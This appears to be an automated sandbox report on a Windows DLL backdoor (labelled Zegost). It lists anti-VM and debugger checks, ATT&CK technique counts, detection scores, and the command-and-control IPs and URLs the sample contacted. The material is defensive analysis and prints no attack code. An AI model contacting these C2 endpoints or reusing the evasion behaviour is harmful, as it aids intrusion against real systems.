Source: rundll32.exe, 00000004.00000002.773257908.00000000028E5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW4
Source: Amcache.hve.15.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.15.dr	Binary or memory string: VMware7,1
Source: Amcache.hve.15.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.15.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.15.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: rundll32.exe, 00000004.00000002.773257908.00000000028E5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.15.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.15.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.15.dr	Binary or memory string: VMware, Inc.me
Source: Amcache.hve.15.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.15.dr	Binary or memory string: VMware-42 35 bb 32 33 75 d2 27-52 00 3c e2 4b d4 32 71
Source: Amcache.hve.15.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_026E0E83 LoadLibraryA,GetProcAddress,

4_2_026E0E83

Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 12_2_10005318 wsprintfA,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,

12_2_10005318

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 107.163.56.232 19	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 107.163.56.231 98	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 107.163.56.110 98	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 107.163.56.251 6658	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 123.126.45.92 80	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Domain query: blog.sina.com.cn

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\abc.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3

Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: Amcache.hve.15.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.15.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_1000490F socket,socket,bind,ioctlsocket,

4_2_1000490F

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	11 Native API	11 Registry Run Keys / Startup Folder	1 Access Token Manipulation	1 Deobfuscate/Decode Files or Information	OS Credential Dumping	2 File and Directory Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	1 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	Scheduled Task/Job	1 Bootkit	111 Process Injection	3 Obfuscated Files or Information	LSASS Memory	11 System Information Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	1 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	11 Registry Run Keys / Startup Folder	3 Software Packing	Security Account Manager	21 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	1 Non-Standard Port	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Masquerading	NTDS	21 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	Scheduled Transfer	1 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	21 Virtualization/Sandbox Evasion	LSA Secrets	1 Process Discovery	SSH	Keylogging	Data Transfer Size Limits	1 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Access Token Manipulation	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	111 Process Injection	DCSync	11 Remote System Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 Bootkit	Proc Filesystem	1 System Network Configuration Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	1 Rundll32	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
abc.dll	79%	Virustotal		Browse
abc.dll	93%	ReversingLabs	Win32.Backdoor.Zegost
abc.dll	100%	Avira	TR/Dropper.Gen
abc.dll	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
18.0.rundll32.exe.10000000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
12.0.rundll32.exe.10000000.1.unpack	100%	Avira	TR/Dropper.Gen	Download File
4.2.rundll32.exe.10000000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
18.0.rundll32.exe.10000000.1.unpack	100%	Avira	TR/Dropper.Gen	Download File
12.2.rundll32.exe.10000000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
12.0.rundll32.exe.10000000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
18.2.rundll32.exe.10000000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File

Domains

Source	Detection	Scanner	Label	Link
blogx.sina.com.cn	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://107.163.56.232:18963/main.php?	0%	Avira URL Cloud	safe
http://blog.sina.com.cn/u/5762479093.	0%	Avira URL Cloud	safe
http://107.163.56.232:18963/main.php~	0%	Avira URL Cloud	safe
http://blog.sina.com.c-k	0%	Avira URL Cloud	safe
http://107.163.56.232:18963/main.phpz	0%	Avira URL Cloud	safe
http://blog.sina.com.cn/u/5762479093i	0%	Avira URL Cloud	safe
http://blog.sina.com.cn/u/5762479093lication	0%	Avira URL Cloud	safe
http://blog.sina.com.cn/u/57624790932	0%	Avira URL Cloud	safe
http://107.163.56.232:18963/main.php~-	0%	Avira URL Cloud	safe
http://107.163.56.232:18963/main.phpileMaps	0%	Avira URL Cloud	safe
http://107.163.56.232:18963/main.phpr	0%	Avira URL Cloud	safe
http://107.163.56.110:18530/u1129.html	0%	Avira URL Cloud	safe
http://107.163.56.232:18963/main.phpP	0%	Avira URL Cloud	safe
http://107.163.56.232:	0%	Avira URL Cloud	safe
http://blog.sina.com.cn/u/%s	0%	Avira URL Cloud	safe
http://blog.sina.com.cn/u/5762479093	0%	Avira URL Cloud	safe
http://blog.sina.com.cn/u/5762479093$n	0%	Avira URL Cloud	safe
http://107.163.56.232:18963/main.phpJ	0%	Avira URL Cloud	safe
http://107.16	0%	Avira URL Cloud	safe
http://107.163.56.231:18530/	0%	Avira URL Cloud	safe
http://107.163.56.232:18963/main.php.sina.com.cn	0%	Avira URL Cloud	safe
http://107.163.56.232:18963/main.phpiceActivation	0%	Avira URL Cloud	safe
http://blog.sina.com.c18963/main.php	0%	Avira URL Cloud	safe
http://107.163.56.232:18963/main.phplication	0%	Avira URL Cloud	safe
http://107.163.56.232:18963/main.phpC:	0%	Avira URL Cloud	safe
http://107.163.56.232:18963/main.phpata	0%	Avira URL Cloud	safe
http://blog.sina.com.c	0%	Avira URL Cloud	safe
http://107.163.56.231:18530/joy.asp?sid=rungnejcntCWrem5Fevte	0%	Avira URL Cloud	safe
http://107.163.56.232:18963/main.php	0%	Avira URL Cloud	safe
http://107.163.56.231:18530//joy.asp?sid=rungnejcntCWrem5Fe5vteX8v2LUicbtudb8mtiWnZeYmZK	0%	Avira URL Cloud	safe
http://blog.sina.com.cn/u/5762479093P	0%	Avira URL Cloud	safe
http://107.163.56.232:n/u/5762479093	0%	Avira URL Cloud	safe
http://107.163.56.232:18963/main.php-	0%	Avira URL Cloud	safe
http://107.163.56.232:18963/main.php.	0%	Avira URL Cloud	safe
http://107.163.56.232:18963/main.phpn	0%	Avira URL Cloud	safe
http://107.163.56.232:18963/main.phph	0%	Avira URL Cloud	safe
http://107.163.56.232:18963/main.phpf	0%	Avira URL Cloud	safe
http://107.163.56.232:18963/main.phption	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
blogx.sina.com.cn	123.126.45.92	true	true	0%, Virustotal, Browse	unknown
blog.sina.com.cn	unknown	unknown	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://107.163.56.232:18963/main.php?	rundll32.exe, 00000004.00000002.773183243.00000000028CD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://blog.sina.com.cn/u/5762479093.	rundll32.exe, 00000004.00000003.506492587.000000000296B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.769142464.000000000296B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://107.163.56.232:18963/main.php~	rundll32.exe, 00000004.00000003.463071693.000000000296B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.463965680.000000000296B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://blog.sina.com.c-k	rundll32.exe, 00000004.00000003.621355433.0000000002933000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://107.163.56.232:18963/main.phpz	rundll32.exe, 00000004.00000003.769259388.00000000028FA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.497981630.00000000028FA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://blog.sina.com.cn/u/5762479093i	rundll32.exe, 00000004.00000003.401571882.00000000028FA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://blog.sina.com.cn/u/5762479093lication	rundll32.exe, 00000004.00000003.700389541.00000000028FB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://blog.sina.com.cn/u/57624790932	rundll32.exe, 00000004.00000002.773183243.00000000028CD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://107.163.56.232:18963/main.php~-	rundll32.exe, 00000004.00000003.700389541.00000000028FB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://107.163.56.232:18963/main.phpileMaps	rundll32.exe, 00000004.00000003.506438395.0000000002933000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://107.163.56.232:18963/main.phpr	rundll32.exe, 00000004.00000003.401571882.00000000028FA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://107.163.56.110:18530/u1129.html	rundll32.exe, 00000004.00000002.773183243.00000000028CD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://107.163.56.232:18963/main.phpP	rundll32.exe, 00000004.00000003.523865021.000000000296B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.515136005.000000000296B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.523761741.000000000296B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.621676038.000000000296B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.621544263.000000000296B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://upx.sf.net	Amcache.hve.15.dr	false		high
http://107.163.56.232:	rundll32.exe, 00000004.00000003.550575319.0000000002942000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://blog.sina.com.cn/u/%s	rundll32.exe, 00000004.00000002.777086863.0000000006E7C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://blog.sina.com.cn/u/5762479093	rundll32.exe, 00000004.00000003.551151432.000000000296B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://blog.sina.com.cn/u/5762479093$n	rundll32.exe, 00000004.00000003.321114729.0000000002932000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.321172786.0000000002938000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://107.163.56.232:18963/main.phpJ	rundll32.exe, 00000004.00000002.773183243.00000000028CD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://107.16	rundll32.exe, 00000004.00000002.774825715.000000000531E000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.774894959.000000000539E000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://107.163.56.231:18530/	rundll32.exe, rundll32.exe, 00000012.00000000.274634042.0000000010012000.00000040.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
http://107.163.56.232:18963/main.php.sina.com.cn	rundll32.exe, 00000004.00000003.573233556.0000000002937000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://107.163.56.232:18963/main.phpiceActivation	rundll32.exe, 00000004.00000003.463071693.000000000296B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.463965680.000000000296B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://blog.sina.com.c18963/main.php	rundll32.exe, 00000004.00000003.648250545.0000000002946000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.523736997.0000000002944000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.515119198.0000000002944000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.648222459.0000000002936000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.506457934.0000000002945000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://107.163.56.232:18963/main.phplication	rundll32.exe, 00000004.00000003.769259388.00000000028FA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://107.163.56.232:18963/main.phpC:	rundll32.exe, 00000004.00000002.775076173.00000000055BA000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.774894959.000000000539E000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://107.163.56.232:18963/main.phpata	rundll32.exe, 00000004.00000003.700389541.00000000028FB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://blog.sina.com.c	rundll32.exe, 00000004.00000003.700288987.0000000002936000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.550621832.0000000002949000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.700120244.0000000002933000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://blog.sina.com.cn/u/5762479093I	rundll32.exe, 00000004.00000002.773183243.00000000028CD000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://107.163.56.231:18530/joy.asp?sid=rungnejcntCWrem5Fevte	rundll32.exe, 00000004.00000002.772649123.00000000002DB000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://107.163.56.232:18963/main.php	rundll32.exe, rundll32.exe, 00000012.00000000.274634042.0000000010012000.00000040.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
http://107.163.56.231:18530//joy.asp?sid=rungnejcntCWrem5Fe5vteX8v2LUicbtudb8mtiWnZeYmZK	rundll32.exe, 00000004.00000002.773183243.00000000028CD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://blog.sina.com.cn/u/5762479093P	rundll32.exe, 00000004.00000003.498090383.000000000296B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.700183285.000000000296B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.700339140.000000000296B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.506492587.000000000296B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://107.163.56.232:n/u/5762479093	rundll32.exe, 00000004.00000003.573233556.0000000002937000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://107.163.56.232:18963/main.phpp	rundll32.exe, 00000004.00000003.401571882.00000000028FA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.410069528.00000000028FA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://107.163.56.232:18963/main.php-	rundll32.exe, 00000004.00000003.497981630.00000000028FA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.463294098.00000000028FA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://107.163.56.232:18963/main.php.	rundll32.exe, 00000004.00000003.621544263.000000000296B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://107.163.56.232:18963/main.phpn	rundll32.exe, 00000004.00000002.773183243.00000000028CD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://107.163.56.232:18963/main.phph	rundll32.exe, 00000004.00000003.401571882.00000000028FA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.410069528.00000000028FA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://107.163.56.232:18963/main.phpf	rundll32.exe, 00000004.00000002.773183243.00000000028CD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://107.163.56.232:18963/main.phption	rundll32.exe, 00000004.00000003.700389541.00000000028FB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
123.126.45.92	blogx.sina.com.cn	China	4808	CHINA169-BJChinaUnicomBeijingProvinceNetworkCN	true
107.163.56.232	unknown	United States	20248	TAKE2US	true
107.163.56.231	unknown	United States	20248	TAKE2US	true
107.163.56.110	unknown	United States	20248	TAKE2US	true
107.163.56.251	unknown	United States	20248	TAKE2US	true

Private

IP
192.168.2.1
127.0.0.1

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	574344
Start date:	17.02.2022
Start time:	20:21:25
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 14m 28s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	abc.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	50
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winDLL@41/11@54/7
EGA Information:	Successful, ratio: 55.6%
HDC Information:	Successful, ratio: 3.8% (good quality ratio 2.6%) Quality average: 44.2% Quality standard deviation: 36.9%
HCA Information:	Successful, ratio: 99% Number of executed functions: 59 Number of non-executed functions: 56
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .dll Override analysis time to 240s for rundll32

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, HxTsr.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.42.73.29, 52.182.143.212
Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, client.wns.windows.com, fs.microsoft.com, onedsblobprdcus15.centralus.cloudapp.azure.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, arc.msn.com
Execution Graph export aborted for target loaddll32.exe, PID 2436 because there are no executed function
Execution Graph export aborted for target rundll32.exe, PID 4396 because there are no executed function
Execution Graph export aborted for target rundll32.exe, PID 456 because there are no executed function
Execution Graph export aborted for target rundll32.exe, PID 984 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
20:22:27	API Interceptor	3839x Sleep call for process: rundll32.exe modified
20:22:35	API Interceptor	1x Sleep call for process: loaddll32.exe modified
20:22:39	API Interceptor	2x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

⊘No context

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
blogx.sina.com.cn	dgrep.exe	Get hash	malicious	Browse	218.30.115.123

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CHINA169-BJChinaUnicomBeijingProvinceNetworkCN	6ygjHXjP4o.dll	Get hash	malicious	Browse	124.200.57.100
	ys78aqF2ao	Get hash	malicious	Browse	222.129.168.6
	qN4tOGAgvW	Get hash	malicious	Browse	124.65.112.44
	dG6x7IXDwU	Get hash	malicious	Browse	115.33.63.16
	x86_64	Get hash	malicious	Browse	210.13.17.26
	mipsel	Get hash	malicious	Browse	123.121.253.77
	mips	Get hash	malicious	Browse	180.187.203.69
	8QzWoGKa5q	Get hash	malicious	Browse	101.41.176.44
	AfubZdb790	Get hash	malicious	Browse	124.200.55.38
	arm7	Get hash	malicious	Browse	113.44.22.59
	x86	Get hash	malicious	Browse	111.196.123.214
	arm	Get hash	malicious	Browse	124.65.112.35
	garm7	Get hash	malicious	Browse	123.118.79.57
	garm	Get hash	malicious	Browse	124.192.102.255
	7iTziJXqwC	Get hash	malicious	Browse	60.207.195.47
	jd0XQtNATh	Get hash	malicious	Browse	103.29.16.133
	tb7HftRvfA	Get hash	malicious	Browse	210.74.78.120
	xd.arm7	Get hash	malicious	Browse	124.205.146.101
	xd.arm	Get hash	malicious	Browse	114.115.176.246
	G3xc54hilG	Get hash	malicious	Browse	121.71.208.180
TAKE2US	wTd0V97sFs	Get hash	malicious	Browse	23.231.236.173
	DHL SHIPMENT PARCEL.exe	Get hash	malicious	Browse	107.163.176.66
	muma.exe	Get hash	malicious	Browse	107.163.176.11
	5egerdHX2a	Get hash	malicious	Browse	198.144.245.114
	4ozT5pZbJI	Get hash	malicious	Browse	74.82.188.239
	Shipping invoice2320214010.exe	Get hash	malicious	Browse	107.163.176.251
	Scan_doc.exe	Get hash	malicious	Browse	107.163.176.231
	b3astmode.arm7	Get hash	malicious	Browse	74.82.188.210
	YisraengBP	Get hash	malicious	Browse	23.231.236.173
	triage_dropped_file.exe	Get hash	malicious	Browse	107.163.176.60
	2Mxp7Z86k3	Get hash	malicious	Browse	107.163.175.179
	ZqCBTuED3b	Get hash	malicious	Browse	23.231.236.181
	qElEhirDBK	Get hash	malicious	Browse	107.163.7.182
	4DrtSJOLjr	Get hash	malicious	Browse	107.163.7.172
	Xa5YQK4r69	Get hash	malicious	Browse	107.163.7.128
	tgSQwVSEzE.exe	Get hash	malicious	Browse	107.163.179.182
	hoho.x86	Get hash	malicious	Browse	23.231.236.176
	3sO4kwopMH.exe	Get hash	malicious	Browse	107.163.179.182
	DEUXRWq2W8.exe	Get hash	malicious	Browse	107.163.179.182
	09090.xlsx	Get hash	malicious	Browse	107.163.179.182

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\1.txt

Download File

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	ISO-8859 text, with CRLF line terminators
Category:	dropped
Size (bytes):	754
Entropy (8bit):	4.252109736945994
Encrypted:	false
SSDEEP:	12:8ItUY984YPtytxtj07txxtSgcgtEMSUOqtZMDMM2yohbg3KBgd8BIZM:84bY1JCVGQbM
MD5:	5AD7C9F27B4B162A23164065E58692BA
SHA1:	C653149F35223C56EEBA33CDD8DC07AA16984A3D
SHA-256:	EF5DD593C416102CE83074DD1C3DBB0AC420082FC0CB07B0F41D80ECDF2FD052
SHA-512:	6EBB629A74A1700D2FC507A28B82FABFB0FBBB34E74EC0F025552B578F43928DF523D22DB073DBF364BF2A2B89A61898D1708B50320FF6AA290D8EB9AB17B800
Malicious:	false
Preview:	..2022-02-19 21:56..iOffset....2022-02-21 17:06..iOffset....2022-02-23 09:07..iOffset....2022-02-25 05:03..iOffset....2022-02-26 21:54..iOffset....2022-02-28 16:40..iOffset....2022-03-02 12:59..iOffset....2022-03-04 05:12..iOffset....2022-03-06 00:58..iOffset....2022-03-07 15:59..iOffset....2022-03-09 10:45..iOffset....2022-03-11 02:31..iOffset....2022-03-12 21:42..iOffset....2022-03-14 14:06..iOffset....2022-03-16 05:39..iOffset....2022-03-17 18:00..iOffset....2022-03-19 13:21..iOffset....2022-03-21 05:00..iOffset....2022-03-23 00:18..iOffset....2022-03-24 19:39..iOffset....2022-03-26 16:00..iOffset....2022-03-28 07:51..iOffset....2022-03-30 02:36..iOffset....2022-03-31 21:53..iOffset....2022-04-02 18:13..iOffset....2022-04-04 08:49..iOffset..

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_80fa17708444a2c77e77e66eb43423f94a9dfb63_82810a17_06abaaff\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.0167244018561883
Encrypted:	false
SSDEEP:	192:z0/JiW0oXAHBUZMX4jed+57nzP/u7sFS274ItWc:o/JiQXoBUZMX4jec3P/u7sFX4ItWc
MD5:	E546AB0EA0EA7180CF04C24EA7016722
SHA1:	59B25B97DF6A89A6766F38C055CD3F9576DF4C81
SHA-256:	6AFC88D828974A82DF56824FC9E74AEF13E89E30FAC0AA19364A91E0DF15A842
